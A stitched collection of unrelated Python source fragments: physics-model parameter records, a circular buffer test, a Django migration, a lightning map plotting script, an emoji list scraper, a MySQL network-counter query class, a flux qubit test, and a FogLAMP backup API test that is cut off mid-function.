'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(sw2)"""', 'texname': '"""s_w"""'}), "(name='sw', nature='internal', type='real', value=\n 'cmath.sqrt(sw2)', texname='s_w')\n", (14021, 14109), False, 'from object_library import all_parameters, Parameter\n'), ((14181, 14268), 'object_library.Parameter', 'Parameter', ([], {'name': '"""g1"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""ee/cw"""', 'texname': '"""g_1"""'}), "(name='g1', nature='internal', type='real', value='ee/cw', texname\n ='g_1')\n", (14190, 14268), False, 'from object_library import all_parameters, Parameter\n'), ((14340, 14427), 'object_library.Parameter', 'Parameter', ([], {'name': '"""gw"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""ee/sw"""', 'texname': '"""g_w"""'}), "(name='gw', nature='internal', type='real', value='ee/sw', texname\n ='g_w')\n", (14349, 14427), False, 'from object_library import all_parameters, Parameter\n'), ((14500, 14602), 'object_library.Parameter', 'Parameter', ([], {'name': '"""vev"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(2*MW*sw)/ee"""', 'texname': '"""\\\\text{vev}"""'}), "(name='vev', nature='internal', type='real', value='(2*MW*sw)/ee',\n texname='\\\\text{vev}')\n", (14509, 14602), False, 'from object_library import all_parameters, Parameter\n'), ((14680, 14806), 'object_library.Parameter', 'Parameter', ([], {'name': '"""mfi"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(100 - (kq*vev**2)/2.)"""', 'texname': '"""M_{\\\\text{fi}}"""'}), "(name='mfi', nature='internal', type='real', value=\n 'cmath.sqrt(100 - (kq*vev**2)/2.)', texname='M_{\\\\text{fi}}')\n", (14689, 14806), False, 'from object_library import all_parameters, Parameter\n'), ((14882, 15231), 'object_library.Parameter', 'Parameter', ([], {'name': '"""AH"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(47*ee**2*(1 - (2*MH**4)/(987.*MT**4) - (14*MH**2)/(705.*MT**2) + (213*MH**12)/(2.634632e7*MW**12) + (5*MH**10)/(119756.*MW**10) + (41*MH**8)/(180950.*MW**8) + (87*MH**6)/(65800.*MW**6) + 
(57*MH**4)/(6580.*MW**4) + (33*MH**2)/(470.*MW**2)))/(72.*cmath.pi**2*vev)"""', 'texname': '"""A_H"""'}), "(name='AH', nature='internal', type='real', value=\n '(47*ee**2*(1 - (2*MH**4)/(987.*MT**4) - (14*MH**2)/(705.*MT**2) + (213*MH**12)/(2.634632e7*MW**12) + (5*MH**10)/(119756.*MW**10) + (41*MH**8)/(180950.*MW**8) + (87*MH**6)/(65800.*MW**6) + (57*MH**4)/(6580.*MW**4) + (33*MH**2)/(470.*MW**2)))/(72.*cmath.pi**2*vev)'\n , texname='A_H')\n", (14891, 15231), False, 'from object_library import all_parameters, Parameter\n'), ((15298, 15492), 'object_library.Parameter', 'Parameter', ([], {'name': '"""GH"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""-(G**2*(1 + (13*MH**6)/(16800.*MT**6) + MH**4/(168.*MT**4) + (7*MH**2)/(120.*MT**2)))/(12.*cmath.pi**2*vev)"""', 'texname': '"""G_H"""'}), "(name='GH', nature='internal', type='real', value=\n '-(G**2*(1 + (13*MH**6)/(16800.*MT**6) + MH**4/(168.*MT**4) + (7*MH**2)/(120.*MT**2)))/(12.*cmath.pi**2*vev)'\n , texname='G_H')\n", (15307, 15492), False, 'from object_library import all_parameters, Parameter\n'), ((15561, 15743), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Gphi"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""-(G**2*(1 + MH**6/(560.*MT**6) + MH**4/(90.*MT**4) + MH**2/(12.*MT**2)))/(8.*cmath.pi**2*vev)"""', 'texname': '"""G_h"""'}), "(name='Gphi', nature='internal', type='real', value=\n '-(G**2*(1 + MH**6/(560.*MT**6) + MH**4/(90.*MT**4) + MH**2/(12.*MT**2)))/(8.*cmath.pi**2*vev)'\n , texname='G_h')\n", (15570, 15743), False, 'from object_library import all_parameters, Parameter\n'), ((15819, 15927), 'object_library.Parameter', 'Parameter', ([], {'name': '"""lam"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""MH**2/(2.*vev**2)"""', 'texname': '"""\\\\text{lam}"""'}), "(name='lam', nature='internal', type='real', value=\n 'MH**2/(2.*vev**2)', texname='\\\\text{lam}')\n", (15828, 15927), False, 'from object_library import all_parameters, Parameter\n'), ((16003, 16115), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yb"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymb*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{yb}"""'}), "(name='yb', nature='internal', type='real', value=\n '(ymb*cmath.sqrt(2))/vev', texname='\\\\text{yb}')\n", (16012, 16115), False, 'from object_library import all_parameters, Parameter\n'), ((16187, 16299), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yc"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymc*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{yc}"""'}), "(name='yc', nature='internal', type='real', value=\n '(ymc*cmath.sqrt(2))/vev', texname='\\\\text{yc}')\n", (16196, 16299), False, 'from object_library import all_parameters, Parameter\n'), ((16372, 16487), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ydo"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymdo*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ydo}"""'}), "(name='ydo', nature='internal', type='real', value=\n '(ymdo*cmath.sqrt(2))/vev', texname='\\\\text{ydo}')\n", (16381, 16487), False, 'from object_library import all_parameters, Parameter\n'), ((16563, 16675), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ye"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(yme*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ye}"""'}), "(name='ye', nature='internal', type='real', value=\n '(yme*cmath.sqrt(2))/vev', texname='\\\\text{ye}')\n", (16572, 
16675), False, 'from object_library import all_parameters, Parameter\n'), ((16747, 16859), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ym"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymm*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ym}"""'}), "(name='ym', nature='internal', type='real', value=\n '(ymm*cmath.sqrt(2))/vev', texname='\\\\text{ym}')\n", (16756, 16859), False, 'from object_library import all_parameters, Parameter\n'), ((16931, 17043), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ys"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(yms*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ys}"""'}), "(name='ys', nature='internal', type='real', value=\n '(yms*cmath.sqrt(2))/vev', texname='\\\\text{ys}')\n", (16940, 17043), False, 'from object_library import all_parameters, Parameter\n'), ((17115, 17227), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yt"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymt*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{yt}"""'}), "(name='yt', nature='internal', type='real', value=\n '(ymt*cmath.sqrt(2))/vev', texname='\\\\text{yt}')\n", (17124, 17227), False, 'from object_library import all_parameters, Parameter\n'), ((17301, 17419), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ytau"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymtau*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ytau}"""'}), "(name='ytau', nature='internal', type='real', value=\n '(ymtau*cmath.sqrt(2))/vev', texname='\\\\text{ytau}')\n", (17310, 17419), False, 'from object_library import all_parameters, Parameter\n'), ((17500, 17615), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yup"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymup*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{yup}"""'}), "(name='yup', nature='internal', type='real', value=\n '(ymup*cmath.sqrt(2))/vev', texname='\\\\text{yup}')\n", (17509, 17615), False, 'from object_library import all_parameters, Parameter\n'), ((17692, 17798), 'object_library.Parameter', 'Parameter', ([], {'name': '"""muH"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(lam*vev**2)"""', 'texname': '"""\\\\mu"""'}), "(name='muH', nature='internal', type='real', value=\n 'cmath.sqrt(lam*vev**2)', texname='\\\\mu')\n", (17701, 17798), False, 'from object_library import all_parameters, Parameter\n')] |
from cspatterns.datastructures import buffer
def test_circular_buffer():
b = buffer.CircularBuffer(2, ['n'])
assert len(b.next) == 2
assert b.n is None
b = buffer.CircularBuffer.create(2, attrs=['n', 'fib'])
curr = b
out = [0, 1, ]
curr.prev[-2].n = 0
curr.prev[-2].fib = 1
curr.prev[-1].n = 1
curr.prev[-1].fib = 1
# we are going to calculate fibonacci
while curr.prev[-1].n < 12:
curr.n = curr.prev[-1].n + 1
curr.fib = curr.prev[-1].fib + curr.prev[-2].fib
out.append(curr.fib)
curr = curr.next[1]
assert out == [0, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233] | [
"cspatterns.datastructures.buffer.CircularBuffer",
"cspatterns.datastructures.buffer.CircularBuffer.create"
]
| [((82, 113), 'cspatterns.datastructures.buffer.CircularBuffer', 'buffer.CircularBuffer', (['(2)', "['n']"], {}), "(2, ['n'])\n", (103, 113), False, 'from cspatterns.datastructures import buffer\n'), ((174, 225), 'cspatterns.datastructures.buffer.CircularBuffer.create', 'buffer.CircularBuffer.create', (['(2)'], {'attrs': "['n', 'fib']"}), "(2, attrs=['n', 'fib'])\n", (202, 225), False, 'from cspatterns.datastructures import buffer\n')] |
# Generated by Django 2.1.7 on 2019-02-17 14:50
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='RedactedClientConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.TextField()),
('password', models.TextField()),
('cookies', models.TextField(null=True)),
('authkey', models.TextField(null=True)),
('passkey', models.TextField(null=True)),
('last_login_failed', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='RedactedThrottledRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('datetime', models.DateTimeField()),
('url', models.CharField(max_length=2048)),
],
options={
'abstract': False,
},
),
]
| [
"django.db.models.TextField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
]
| [((316, 409), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (332, 409), False, 'from django.db import migrations, models\n'), ((437, 455), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (453, 455), False, 'from django.db import migrations, models\n'), ((487, 505), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (503, 505), False, 'from django.db import migrations, models\n'), ((536, 563), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (552, 563), False, 'from django.db import migrations, models\n'), ((594, 621), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (610, 621), False, 'from django.db import migrations, models\n'), ((652, 679), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (668, 679), False, 'from django.db import migrations, models\n'), ((720, 754), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (739, 754), False, 'from django.db import migrations, models\n'), ((904, 997), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (920, 997), False, 'from django.db import migrations, models\n'), ((1025, 1047), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (1045, 1047), False, 'from django.db import migrations, models\n'), ((1074, 1107), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2048)'}), '(max_length=2048)\n', (1090, 1107), False, 'from django.db import migrations, models\n')] |
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from numpy import array
from numpy import max
map = Basemap(llcrnrlon=-0.5,llcrnrlat=39.8,urcrnrlon=4.,urcrnrlat=43.,
resolution='i', projection='tmerc', lat_0 = 39.5, lon_0 = 1)
map.readshapefile('../sample_files/lightnings', 'lightnings')
x = []
y = []
c = []
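# Collect strike coordinates and absolute amplitude values from the shapefile records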
for info, lightning in zip(map.lightnings_info, map.lightnings):
x.append(lightning[0])
y.append(lightning[1])
if float(info['amplitude']) < 0:
c.append(-1 * float(info['amplitude']))
else:
c.append(float(info['amplitude']))
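# Figure 0: default hexbin of the number of strikes per cell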
plt.figure(0)
map.drawcoastlines()
map.readshapefile('../sample_files/comarques', 'comarques')
map.hexbin(array(x), array(y))
map.colorbar(location='bottom')
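# Figure 1: coarser 20-cell grid with logarithmic count bins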
plt.figure(1)
map.drawcoastlines()
map.readshapefile('../sample_files/comarques', 'comarques')
map.hexbin(array(x), array(y), gridsize=20, mincnt=1, cmap='summer', bins='log')
map.colorbar(location='bottom', format='%.1f', label='log(# lightnings)')
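# Figure 2: logarithmic color normalization with explicit colorbar ticks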
plt.figure(2)
map.drawcoastlines()
map.readshapefile('../sample_files/comarques', 'comarques')
map.hexbin(array(x), array(y), gridsize=20, mincnt=1, cmap='summer', norm=colors.LogNorm())
cb = map.colorbar(location='bottom', format='%d', label='# lightnings')
cb.set_ticks([1, 5, 10, 15, 20, 25, 30])
cb.set_ticklabels([1, 5, 10, 15, 20, 25, 30])
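# Figure 3: cells colored by amplitude, aggregated per cell with reduce_C_function=max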
plt.figure(3)
map.drawcoastlines()
map.readshapefile('../sample_files/comarques', 'comarques')
map.hexbin(array(x), array(y), C = array(c), reduce_C_function = max, gridsize=20, mincnt=1, cmap='YlOrBr', linewidths=0.5, edgecolors='k')
map.colorbar(location='bottom', label='Mean amplitude (kA)')
plt.show()
| [
"matplotlib.pyplot.show",
"numpy.array",
"mpl_toolkits.basemap.Basemap",
"matplotlib.pyplot.figure",
"matplotlib.colors.LogNorm"
]
| [((162, 293), 'mpl_toolkits.basemap.Basemap', 'Basemap', ([], {'llcrnrlon': '(-0.5)', 'llcrnrlat': '(39.8)', 'urcrnrlon': '(4.0)', 'urcrnrlat': '(43.0)', 'resolution': '"""i"""', 'projection': '"""tmerc"""', 'lat_0': '(39.5)', 'lon_0': '(1)'}), "(llcrnrlon=-0.5, llcrnrlat=39.8, urcrnrlon=4.0, urcrnrlat=43.0,\n resolution='i', projection='tmerc', lat_0=39.5, lon_0=1)\n", (169, 293), False, 'from mpl_toolkits.basemap import Basemap\n'), ((656, 669), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {}), '(0)\n', (666, 669), True, 'import matplotlib.pyplot as plt\n'), ((820, 833), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (830, 833), True, 'import matplotlib.pyplot as plt\n'), ((1076, 1089), 'matplotlib.pyplot.figure', 'plt.figure', (['(2)'], {}), '(2)\n', (1086, 1089), True, 'import matplotlib.pyplot as plt\n'), ((1430, 1443), 'matplotlib.pyplot.figure', 'plt.figure', (['(3)'], {}), '(3)\n', (1440, 1443), True, 'import matplotlib.pyplot as plt\n'), ((1731, 1741), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1739, 1741), True, 'import matplotlib.pyplot as plt\n'), ((764, 772), 'numpy.array', 'array', (['x'], {}), '(x)\n', (769, 772), False, 'from numpy import array\n'), ((774, 782), 'numpy.array', 'array', (['y'], {}), '(y)\n', (779, 782), False, 'from numpy import array\n'), ((928, 936), 'numpy.array', 'array', (['x'], {}), '(x)\n', (933, 936), False, 'from numpy import array\n'), ((938, 946), 'numpy.array', 'array', (['y'], {}), '(y)\n', (943, 946), False, 'from numpy import array\n'), ((1184, 1192), 'numpy.array', 'array', (['x'], {}), '(x)\n', (1189, 1192), False, 'from numpy import array\n'), ((1194, 1202), 'numpy.array', 'array', (['y'], {}), '(y)\n', (1199, 1202), False, 'from numpy import array\n'), ((1538, 1546), 'numpy.array', 'array', (['x'], {}), '(x)\n', (1543, 1546), False, 'from numpy import array\n'), ((1548, 1556), 'numpy.array', 'array', (['y'], {}), '(y)\n', (1553, 1556), False, 'from numpy import array\n'), ((1247, 1263), 'matplotlib.colors.LogNorm', 'colors.LogNorm', ([], {}), '()\n', (1261, 1263), True, 'import matplotlib.colors as colors\n'), ((1562, 1570), 'numpy.array', 'array', (['c'], {}), '(c)\n', (1567, 1570), False, 'from numpy import array\n')] |
import html
from collections import namedtuple
from pathlib import Path
from typing import List, Dict
import requests
from bs4 import BeautifulSoup
from lxml import etree
from lxml.etree import XPath
Emoji = namedtuple('Emoji', 'char name')
class EmojiExtractor(object):
def __init__(self):
self.all_emojis = self.fetch_emoji_list()
self.annotations = self.fetch_annotations()
self.base_emojis = self.fetch_base_emojis()
def fetch_emoji_list(self: 'EmojiExtractor') -> List[Emoji]:
print('Downloading list of all emojis')
data = requests.get(
'https://unicode.org/emoji/charts-14.0/full-emoji-list.html',
timeout=120
) # type: requests.Response
html = BeautifulSoup(data.text, 'lxml')
emojis = []
for row in html.find('table').find_all('tr'):
if not row.th:
emoji = row.find('td', {'class': 'chars'}).string
description = row.find('td', {'class': 'name'}).string.replace('⊛ ', '')
emojis.append(Emoji(emoji, description))
return emojis
def fetch_annotations(self: 'EmojiExtractor') -> Dict[chr, List[str]]:
print('Downloading annotations')
data = requests.get(
'https://raw.githubusercontent.com/unicode-org/cldr/latest/common/annotations/en.xml',
timeout=60
) # type: requests.Response
xpath = XPath('./annotations/annotation[not(@type="tts")]')
return {element.get('cp'): element.text.split(' | ')
for element in xpath(etree.fromstring(data.content))}
def fetch_base_emojis(self: 'EmojiExtractor') -> List[chr]:
print('Downloading list of human emojis...')
data = requests.get(
'https://unicode.org/Public/14.0.0/ucd/emoji/emoji-data.txt',
timeout=60
) # type: requests.Response
started = False
emojis = []
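        # Scan emoji-data.txt and collect the code point ranges in the Emoji_Modifier_Base block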
for line in data.text.split('\n'):
if not started and line != '# All omitted code points have Emoji_Modifier_Base=No ':
continue
started = True
if line == '# Total elements: 132':
break
if line and not line.startswith('#'):
emojis.extend(self.resolve_character_range(line.split(';')[0].strip()))
return emojis
def resolve_character_range(self, line: str) -> List[str]:
try:
(start, end) = line.split('..')
return [chr(char) for char in range(int(start, 16), int(end, 16) + 1)]
except ValueError:
return [self.resolve_character(line)]
def resolve_character(self, string: str) -> str:
return "".join(chr(int(character, 16)) for character in string.split(' '))
def write_symbol_file(self: 'EmojiExtractor'):
print('Writing collected emojis to symbol file')
with Path('../picker/data/emojis.csv').open('w') as symbol_file:
for entry in self.compile_entries(self.all_emojis):
symbol_file.write(entry + "\n")
def compile_entries(self: 'EmojiExtractor', emojis: List[Emoji]) -> List[str]:
annotated_emojis = []
for emoji in emojis:
entry = f"{emoji.char} {html.escape(emoji.name)}"
if emoji.char in self.annotations:
entry += f" <small>({html.escape(', '.join([annotation for annotation in self.annotations[emoji.char] if annotation != emoji.name]))})</small>"
annotated_emojis.append(entry)
return annotated_emojis
def write_metadata_file(self: 'EmojiExtractor'):
print('Writing metadata to metadata file')
with Path('../picker/copyme.py').open('w') as metadata_file:
metadata_file.write('skin_tone_selectable_emojis={\'')
metadata_file.write('\', \''.join(self.base_emojis))
metadata_file.write('\'}\n')
def extract(self: 'EmojiExtractor'):
self.write_symbol_file()
self.write_metadata_file()
| [
"collections.namedtuple",
"lxml.etree.XPath",
"pathlib.Path",
"requests.get",
"html.find",
"bs4.BeautifulSoup",
"lxml.etree.fromstring",
"html.escape"
]
| [((210, 242), 'collections.namedtuple', 'namedtuple', (['"""Emoji"""', '"""char name"""'], {}), "('Emoji', 'char name')\n", (220, 242), False, 'from collections import namedtuple\n'), ((584, 675), 'requests.get', 'requests.get', (['"""https://unicode.org/emoji/charts-14.0/full-emoji-list.html"""'], {'timeout': '(120)'}), "('https://unicode.org/emoji/charts-14.0/full-emoji-list.html',\n timeout=120)\n", (596, 675), False, 'import requests\n'), ((749, 781), 'bs4.BeautifulSoup', 'BeautifulSoup', (['data.text', '"""lxml"""'], {}), "(data.text, 'lxml')\n", (762, 781), False, 'from bs4 import BeautifulSoup\n'), ((1252, 1373), 'requests.get', 'requests.get', (['"""https://raw.githubusercontent.com/unicode-org/cldr/latest/common/annotations/en.xml"""'], {'timeout': '(60)'}), "(\n 'https://raw.githubusercontent.com/unicode-org/cldr/latest/common/annotations/en.xml'\n , timeout=60)\n", (1264, 1373), False, 'import requests\n'), ((1442, 1493), 'lxml.etree.XPath', 'XPath', (['"""./annotations/annotation[not(@type="tts")]"""'], {}), '(\'./annotations/annotation[not(@type="tts")]\')\n', (1447, 1493), False, 'from lxml.etree import XPath\n'), ((1759, 1849), 'requests.get', 'requests.get', (['"""https://unicode.org/Public/14.0.0/ucd/emoji/emoji-data.txt"""'], {'timeout': '(60)'}), "('https://unicode.org/Public/14.0.0/ucd/emoji/emoji-data.txt',\n timeout=60)\n", (1771, 1849), False, 'import requests\n'), ((822, 840), 'html.find', 'html.find', (['"""table"""'], {}), "('table')\n", (831, 840), False, 'import html\n'), ((1592, 1622), 'lxml.etree.fromstring', 'etree.fromstring', (['data.content'], {}), '(data.content)\n', (1608, 1622), False, 'from lxml import etree\n'), ((2915, 2948), 'pathlib.Path', 'Path', (['"""../picker/data/emojis.csv"""'], {}), "('../picker/data/emojis.csv')\n", (2919, 2948), False, 'from pathlib import Path\n'), ((3266, 3289), 'html.escape', 'html.escape', (['emoji.name'], {}), '(emoji.name)\n', (3277, 3289), False, 'import html\n'), ((3692, 3719), 'pathlib.Path', 'Path', (['"""../picker/copyme.py"""'], {}), "('../picker/copyme.py')\n", (3696, 3719), False, 'from pathlib import Path\n')] |
#!/usr/bin/env python3
"""
@author: <NAME>
MySql Parser for graphical presentation
"""
import mysql.connector
import datetime
from mysql.connector import Error
from datetime import datetime, timedelta
import json
class sql_graph_info():
def __init__(self, node, interface, time, sql_creds, db):
"""
Initializer for the sql_graph_info Object.
"""
self.node = node
self.interface = interface
self.time = time
self.sql_creds = sql_creds
self.db = db
    def db_pull(self, node, interface, time):
""" Pulls the RX and TX information from the database
to display for the graphs page.
Arguments:
node [str] -- The node that holds the interface which
                is to be presented.
interface [str] -- The interface in which the counter
information will be based off of.
time [str] -- Time ranging from 30 minutes to 10 Years
Returns:
dict -- containing arrays of the counter values at
            their corresponding timestamp.
"""
data_end = datetime.now()
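        # Map the requested range code onto a window start time (30 minutes up to ~10 years)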
if time == '1':
data_start = datetime.now() - timedelta(hours=0, minutes=30)
elif time == '2':
data_start = datetime.now() - timedelta(hours=1)
elif time == '3':
data_start = datetime.now() - timedelta(hours=2)
elif time == '4':
data_start = datetime.now() - timedelta(hours=6)
elif time == '5':
data_start = datetime.now() - timedelta(days=1)
else:
data_start = datetime.now() - timedelta(days=3650)
data_end.strftime('%Y-%m-%d %H:%M:%S')
data_start.strftime('%Y-%m-%d %H:%M:%S')
node_st = "openflow" + node
query = (
f"SELECT timestamp, Rx_pckts, Tx_pckts, Rx_drops, Tx_drops "
f"FROM {node_st}_counters WHERE "
f"Interface='openflow:{node}:{interface}'"
f"AND timestamp >= '{data_start}'"
f"AND timestamp < '{data_end}'"
)
mydb = mysql.connector.connect(
host=self.sql_creds['host'],
user=self.sql_creds['user'],
passwd=self.sql_creds['password'],
database=self.db
)
cur = mydb.cursor()
cur.execute(query)
response = cur.fetchall()
graphPoints = []
displayPoints = []
dataPointDict = {}
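        # Turn the cumulative counter samples into per-interval differences for display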
for dataPoint in response:
date = str(dataPoint[0])
rx_count = int(dataPoint[1])
tx_count = int(dataPoint[2])
rx_drops = int(dataPoint[3])
tx_drops = int(dataPoint[4])
if dataPointDict:
old_rx_c = int(dataPointDict['rx_count'])
old_tx_c = int(dataPointDict["tx_count"])
old_rx_d = int(dataPointDict["rx_drops"])
old_tx_d = int(dataPointDict["tx_drops"])
dif_rx_c = rx_count - old_rx_c
dif_tx_c = tx_count - old_tx_c
dif_rx_d = rx_drops - old_rx_d
dif_tx_d = tx_drops - old_tx_d
difDict = {"date": date, "rx_count": dif_rx_c,
"tx_count": dif_tx_c,
"rx_drops": dif_rx_d,
"tx_drops": dif_tx_d}
displayPoints.append(difDict)
dataPointDict = {"date": date, "rx_count": rx_count,
"tx_count": tx_count, "rx_drops": rx_drops,
"tx_drops": tx_drops}
graphPoints.append(dataPointDict)
return displayPoints
| [
"datetime.datetime.now",
"datetime.timedelta"
]
| [((1161, 1175), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1173, 1175), False, 'from datetime import datetime, timedelta\n'), ((1225, 1239), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1237, 1239), False, 'from datetime import datetime, timedelta\n'), ((1242, 1272), 'datetime.timedelta', 'timedelta', ([], {'hours': '(0)', 'minutes': '(30)'}), '(hours=0, minutes=30)\n', (1251, 1272), False, 'from datetime import datetime, timedelta\n'), ((1324, 1338), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1336, 1338), False, 'from datetime import datetime, timedelta\n'), ((1341, 1359), 'datetime.timedelta', 'timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (1350, 1359), False, 'from datetime import datetime, timedelta\n'), ((1411, 1425), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1423, 1425), False, 'from datetime import datetime, timedelta\n'), ((1428, 1446), 'datetime.timedelta', 'timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (1437, 1446), False, 'from datetime import datetime, timedelta\n'), ((1498, 1512), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1510, 1512), False, 'from datetime import datetime, timedelta\n'), ((1515, 1533), 'datetime.timedelta', 'timedelta', ([], {'hours': '(6)'}), '(hours=6)\n', (1524, 1533), False, 'from datetime import datetime, timedelta\n'), ((1585, 1599), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1597, 1599), False, 'from datetime import datetime, timedelta\n'), ((1602, 1619), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (1611, 1619), False, 'from datetime import datetime, timedelta\n'), ((1659, 1673), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1671, 1673), False, 'from datetime import datetime, timedelta\n'), ((1676, 1696), 'datetime.timedelta', 'timedelta', ([], {'days': '(3650)'}), '(days=3650)\n', (1685, 1696), False, 'from datetime import datetime, timedelta\n')] |
# test_fluxqubit.py
# meant to be run with 'pytest'
#
# This file is part of scqubits.
#
# Copyright (c) 2019 and later, <NAME> and <NAME>
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
############################################################################
import numpy as np
from scqubits import FluxQubit
from scqubits.tests.conftest import StandardTests
class TestFluxQubit(StandardTests):
@classmethod
def setup_class(cls):
cls.qbt = None
cls.qbt_type = FluxQubit
cls.file_str = "fluxqubit"
cls.op1_str = "n_1_operator"
cls.op2_str = "n_2_operator"
cls.param_name = "flux"
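        # sweep the external flux through the qubit's sweet spot at half a flux quantum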
cls.param_list = np.linspace(0.45, 0.55, 50)
| [
"numpy.linspace"
]
| [((788, 815), 'numpy.linspace', 'np.linspace', (['(0.45)', '(0.55)', '(50)'], {}), '(0.45, 0.55, 50)\n', (799, 815), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
import os
import asyncio
import json
from unittest.mock import MagicMock, patch
from collections import Counter
from aiohttp import web
import pytest
from foglamp.services.core import routes
from foglamp.services.core import connect
from foglamp.plugins.storage.common.backup import Backup
from foglamp.plugins.storage.common.restore import Restore
from foglamp.plugins.storage.common import exceptions
from foglamp.services.core.api import backup_restore
from foglamp.common.storage_client.storage_client import StorageClientAsync
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2017 OSIsoft, LLC"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
@asyncio.coroutine
def mock_coro(*args, **kwargs):
    """Return the first positional argument (or '' when none is given) so patched
    coroutine methods have a value to await."""
    if len(args) > 0:
        return args[0]
    else:
        return ""
@pytest.allure.feature("unit")
@pytest.allure.story("api", "backup")
class TestBackup:
"""Unit test the Backup functionality
"""
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
@pytest.mark.parametrize("input_data, expected", [
(1, "RUNNING"),
(2, "COMPLETED"),
(3, "CANCELED"),
(4, "INTERRUPTED"),
(5, "FAILED"),
(6, "RESTORED"),
(7, "UNKNOWN")
])
def test_get_status(self, input_data, expected):
assert expected == backup_restore._get_status(input_data)
@pytest.mark.parametrize("request_params", [
'',
'?limit=1',
'?skip=1',
'?status=completed',
'?status=failed',
'?status=restored&skip=10',
'?status=running&limit=1',
'?status=canceled&limit=10&skip=0',
'?status=interrupted&limit=&skip=',
'?status=&limit=&skip='
])
async def test_get_backups(self, client, request_params):
storage_client_mock = MagicMock(StorageClientAsync)
response = [{'file_name': '1.dump',
'id': 1, 'type': '1', 'status': '2',
'ts': '2018-02-15 15:18:41.821978+05:30',
'exit_code': '0'}]
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_all_backups', return_value=mock_coro(response)):
resp = await client.get('/foglamp/backup{}'.format(request_params))
